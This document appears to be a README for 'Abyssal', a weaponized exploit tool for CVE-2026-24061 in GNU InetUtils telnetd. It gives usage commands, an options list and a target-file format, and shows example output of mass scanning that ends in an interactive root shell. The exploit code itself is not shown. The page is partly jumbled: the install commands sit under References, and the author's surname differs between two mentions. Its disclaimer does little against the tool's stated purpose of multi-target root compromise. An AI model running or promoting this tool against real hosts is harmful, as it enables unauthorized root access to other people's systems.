Share
## https://sploitus.com/exploit?id=C10D9912-43B3-59FD-921F-E8A21A7D37CD
# πŸ”₯ Abyssal

**CVE-2026-24061 Telnet Vulnerability Scanner & Exploit**

> From the depths, we rise.  
> Multi-threaded, false-positive detection, interactive root shell on success.

---

## πŸ‘¨β€πŸ’» About the Author

This project was built by an experienced IT professional with decades of hands-on work in network security, infrastructure, and software development. At 55, I am actively seeking new opportunitiesβ€”whether as a full-time employee, freelancer, or project collaborator. If you value experience, deep technical knowledge, and a no-nonsense approach to problem-solving, let's connect.

πŸ“« I am open to job offers worldwide.

βœ‰οΈ Contact: [klaus@schloss-buskow.de]

---

## ⚑ Features

- πŸš€ **Multi-threaded scanning** β€” Scan hundreds of targets in parallel
- 🎯 **CVE-2026-24061 exploitation** β€” Weaponized exploit for GNU InetUtils Telnetd
- πŸ›‘οΈ **False-positive detection** β€” Verifies real interactive connections
- πŸ’» **Interactive root shell** β€” Direct shell access on vulnerable systems
- πŸ“Š **Detailed logging** β€” Comprehensive results with timestamps
- πŸ“ **Results export** β€” Automatic saving of vulnerable targets
- 🌐 **IPv4 & CIDR support** β€” Scan single IPs or entire subnets

---

## πŸš€ Installation

# Clone the repository

πŸ“– Usage

Basic Scan (Non-Interactive)

```bash
python3 abyssal.py -f targets.txt
```
Interactive Mode (Get Shell on Success)
```bash
python3 abyssal.py -f targets.txt --interactive
```
Advanced Options
```bash
python3 abyssal.py -f targets.txt -t 20 --interactive -o scan.log
```
Command Line Options

Option	Description

-f, --file	File with IP addresses (default: ip_list.txt)

-t, --threads	Number of parallel threads (default: 10)

-i, --interactive	Interactive mode β€” get shell on vulnerable systems

-o, --output	Log file name (auto-generated if not specified)

-c, --connect-timeout	Connection timeout in seconds (default: 5)

-s, --session-timeout	Session timeout in seconds (default: 10)

--version	Show version information

-h, --help	Show help message

πŸ“‚ Target File Format
Create a file with one target per line:

```text
# Single IPs
192.168.1.100
10.0.0.50

# IP with custom port
192.168.1.200:2323

# Subnet (CIDR) β€” support coming soon
# 192.168.1.0/24

# Comments are allowed
172.16.1.25  # Office server
```

πŸ“Š Example Output
```text
╔═══════════════════════════════════════════════════════════════════════════════╗
β•‘                                                                               β•‘
β•‘   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—                         β•‘
β•‘  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘                         β•‘
β•‘  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘                         β•‘
β•‘  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—  β•šβ–ˆβ–ˆβ•”β•  β•šβ•β•β•β•β–ˆβ–ˆβ•‘β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘                         β•‘
β•‘  β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—                    β•‘
β•‘  β•šβ•β•  β•šβ•β•β•šβ•β•β•β•β•β•    β•šβ•β•   β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β•β•šβ•β•β•β•β•β•β•                    β•‘
β•‘                                                                               β•‘
β•‘  Abyssal - CVE-2026-24061 Telnet Vulnerability Scanner                        β•‘
β•‘  "From the depths, we rise."                                                  β•‘
β•‘                                                                               β•‘
β•‘  Built by: Klaus Engelberth                                                   β•‘
β•‘  Contact:  klaus@schloss-buskow.de                                            β•‘
β•‘  Status:   Open for new opportunities worldwide                               β•‘
β•‘                                                                               β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

⚠️  INTERACTIVE MODE ENABLED!
   On REAL login prompt or shell, control will be passed to you.
   False positives are automatically detected and ignored.
   Press CTRL+C to abort.

Starting scan with 10 parallel threads
Total: 100 targets to test
============================================================

🎯 REAL ROOT SHELL (#) ON 192.168.1.100:23 OBTAINED!
============================================================
>>> You now have shell access!
>>> Execute any commands (whoami, id, ls, etc.)
>>> Type 'exit' or press CTRL+C to close
------------------------------------------------------------

# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit

[*] Session on 192.168.1.100:23 closed.

============================================================
SCAN COMPLETED
============================================================
Duration: 45.23 seconds
Targets tested: 100

πŸ“Š SUMMARY:
  βœ… REAL VULNERABLE:  15
  πŸ”’ PROTECTED:        42
  ❓ FAILED:           23
  🌐 UNREACHABLE:      20
  ⚠️  FALSE POSITIVES:  0

🚨 SECURITY WARNING:
  15 system(s) are REALLY vulnerable to CVE-2026-24061!
  β†’ Disable or patch Telnet immediately!
  β†’ Use SSH as a secure alternative!

⚠️ Disclaimer
This tool is for authorized security testing and educational purposes only.

Only use on systems you own or have explicit written permission to test

Unauthorized access to computer systems is illegal

The author assumes no responsibility for misuse of this tool

Use responsibly and at your own risk
```
πŸ“ License

This project is licensed under the MIT License β€” see the LICENSE file for details.

🀝 Connect

Klaus Baumdick
πŸ“« Email: klaus@schloss-buskow.de

πŸ”— GitHub: github.com/stoerti2

πŸ“Œ Status: Open for new opportunities worldwide

πŸ“š References

CVE-2026-24061

GNU InetUtils Telnetd Vulnerability

git clone https://github.com/stoerti2/abyssal.git

cd abyssal

# Install dependencies
pip install pexpect